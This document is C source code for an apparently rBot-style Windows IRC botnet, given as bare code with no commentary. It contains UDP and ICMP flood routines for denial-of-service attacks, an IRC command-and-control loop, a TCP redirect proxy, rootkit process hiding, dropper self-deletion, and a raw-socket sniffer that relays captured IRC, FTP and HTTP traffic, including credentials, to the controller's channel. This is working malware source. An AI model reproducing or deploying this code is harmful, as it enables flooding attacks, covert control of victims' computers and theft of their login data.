// function for sending udp packets DWORD WINAPI udp(LPVOID param) { PINGFLOOD udp = *((PINGFLOOD *)param); PINGFLOOD *udps = (PINGFLOOD *)param; udps->gotinfo = TRUE; char sendbuf[IRCLINE], pbuff[MAXPINGSIZE]; int i; srand(GetTickCount()); SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; IN_ADDR iaddr; iaddr.s_addr = finet_addr(udp.host); LPHOSTENT hostent = NULL; if (iaddr.s_addr == INADDR_NONE) hostent = fgethostbyname(udp.host); if (hostent == NULL && iaddr.s_addr == INADDR_NONE) { sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host); if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice); addlog(sendbuf); clearthread(udp.threadnum); ExitThread(1); } ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr)); ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port))); if (udp.port < 1) udp.port = 1; if (udp.port > MAXUDPPORT) udp.port = MAXUDPPORT; udp.num = udp.num / 10; if (udp.delay == 0) udp.delay = 1; for (i = 0; i < udp.size; i++) pbuff[i] = (char)(rand() % 255); while (udp.num-- > 0) { //change port every 10 packets (if one isn't specified) for (i = 0; i < 11; i++) { fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin)); Sleep(udp.delay); } if (udp.port == 0) ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1)); } sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host); if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice); addlog(sendbuf); clearthread(udp.threadnum); ExitThread(0); }
SOCKET CreateSock(char *host, unsigned short port) { SOCKET ssock; if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) return INVALID_SOCKET; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(port); IN_ADDR in; in.s_addr = finet_addr(host); LPHOSTENT Hostent = NULL; if (in.s_addr == INADDR_NONE) Hostent = fgethostbyname(host); //hostname if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns return INVALID_SOCKET; ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in)); if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); return INVALID_SOCKET; } return (ssock); }
// function for sending pings DWORD WINAPI ping(LPVOID param) { char sendbuf[IRCLINE], pbuff[MAXPINGSIZE]; unsigned long ip; PINGFLOOD ping = *((PINGFLOOD *)param); PINGFLOOD *pings = (PINGFLOOD *)param; pings->gotinfo = TRUE; HANDLE icmp = (HANDLE)fIcmpCreateFile(); IN_ADDR iaddr; iaddr.s_addr = finet_addr(ping.host); LPHOSTENT hostent = NULL; if (iaddr.s_addr == INADDR_NONE) hostent = fgethostbyname(ping.host); if ((hostent == NULL && iaddr.s_addr == INADDR_NONE) || icmp == INVALID_HANDLE_VALUE) { sprintf(sendbuf,"[PING]: Error sending pings to %s.", ping.host); if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice); addlog(sendbuf); clearthread(ping.threadnum); ExitThread(1); } if (hostent != NULL) ip = *(DWORD*)*hostent->h_addr_list; else ip = iaddr.s_addr; ICMP_ECHO_REPLY reply; memset(&reply, 0, sizeof(reply)); reply.RoundTripTime = 0xffffffff; if (ping.size > MAXPINGSIZE) ping.size = MAXPINGSIZE; if (ping.delay < 1) ping.delay = 1; for (int i = 0; i < ping.num; i++) fIcmpSendEcho(icmp, ip, pbuff, ping.size, NULL, &reply, sizeof(ICMP_ECHO_REPLY), ping.delay); fIcmpCloseHandle(icmp); sprintf(sendbuf,"[PING]: Finished sending pings to %s.", ping.host); if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice); addlog(sendbuf); clearthread(ping.threadnum); ExitThread(0); }
DWORD WINAPI Bthd(LPVOID param) { for (int m=0;m<6;m++) { if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle))) Sleep(5000); else break; } if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT) ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); srand(GetTickCount()); dwstarted=GetTickCount(); WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); int i=0; DWORD id=0; char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(sinfo[curserver].host,sinfo[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(srvsz-1)) curserver=0; else curserver++; } // cleanup; //killthreadall(); fWSACleanup(); ReleaseMutex(xetum); ExitThread(0); return TRUE; }
// part of the redirect function, handles sending/recieving for the remote connection. DWORD WINAPI RedirectLoopThread(LPVOID param) { REDIRECT redirect = *((REDIRECT *)param); REDIRECT *redirectp = (REDIRECT *)param; redirectp->gotinfo = TRUE; int threadnum=redirect.cthreadnum; char sendbuf[IRCLINE], buff[4096]; int err; DWORD id; SOCKET ssock; do { if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(redirect.port); IN_ADDR iaddr; iaddr.s_addr = finet_addr(redirect.dest); LPHOSTENT hostent; if (iaddr.s_addr == INADDR_NONE) hostent = fgethostbyname(redirect.dest); else hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET); if (hostent == NULL) break; ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list); if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break; redirect.cgotinfo = FALSE; sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum); redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock); threads[redirect.cthreadnum].parent = redirect.threadnum; threads[redirect.cthreadnum].csock = threads[threadnum].sock; if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) { while (redirect.cgotinfo == FALSE) Sleep(50); } else { addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError()); break; } while (1) { memset(buff, 0, sizeof(buff)); if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break; if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break; } break; } while (1); fclosesocket(threads[threadnum].sock); fclosesocket(ssock); clearthread(threadnum); ExitThread(0); }
DWORD WINAPI BotThread(LPVOID param) { for (int m=0;m<6;m++) { if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle))) Sleep(5000); else break; } // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT) // ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); #ifndef _DEBUG #ifndef NO_MELT char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name); if (melt) { SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL); int tries=0; while (FileExists(melt) && tries<3) { DeleteFile(melt); tries++; Sleep(2000); } RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name); } #endif // NO_MELT #endif // _DEBUG srand(GetTickCount()); dwstarted=GetTickCount(); #ifndef NO_VERSION_REPLY curversion=rand()%(versionsize); #ifdef _DEBUG printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]); #endif #endif WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); #ifndef _DEBUG #ifndef NO_FCONNECT char readbuf[1024]; HINTERNET httpopen, openurl; DWORD read; httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL); if (!openurl) { fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); } fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read); fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); #endif // NO_FCONNECT #endif // _DEBUG #ifndef NO_INSTALLED_TIME if (!noadvapi32) GetInstalledTime(); else sprintf(installedt,"Error"); #endif // NO_INSTALLED_TIME int i=0; DWORD id=0; #ifndef NO_RECORD_UPTIME i=addthread(RUPTIME_THREAD,str_rup_thread,main_title); threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id); #endif // NO_RECORD_UPTIME #ifndef NO_AUTO_SECURE #ifndef NO_SECURE NTHREAD secure; secure.bdata2=TRUE;//loop i=addthread(SECURE_THREAD,str_asecure_thread,sec_title); threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id); #endif #endif // NO_AUTO_SECURE #ifndef NO_RDRIV #ifndef _DEBUG rkenabled=InitRK();//initialize fu if (rkenabled) HideMe();//hide the process #endif // _DEBUG #endif // NO_RDRIV #ifndef _DEBUG // maybe this will give the shutdown handler time to work RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000"); #endif //get internal ip char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(servers[curserver].host,servers[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(serversize-1)) curserver=0; else curserver++; } // cleanup; killthreadall(); fWSACleanup(); ReleaseMutex(mutex); ExitThread(0); }
DWORD WINAPI SnifferThread(LPVOID param) { SNIFFER sniff = *((SNIFFER *)param); SNIFFER *sniffs = (SNIFFER *)param; sniffs->gotinfo = TRUE; char sendbuf[IRCLINE]; int sock; sockaddr_in addr_in; hostent *hEnt; IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; char szName[255]={0}; unsigned long lLocalIp; addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); addr_in.sin_addr.s_addr=lLocalIp; sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); if(sock==INVALID_SOCKET) return NULL; if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } int optval=1; DWORD dwBytesRet; if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; while(1) { // Clear the buffer memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; // Read the raw packet iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); // Process if its a TCP/IP packet if(ipHeader->proto==6) { tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25) { sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); for(int i=0; i<(int)strlen(szPacket); i++) { if(szPacket[i]=='\r') szPacket[i]='\x20'; if(szPacket[i]=='\n') szPacket[i]='\x20'; } if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousHTTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousVULN(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } } } } fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); return 0; }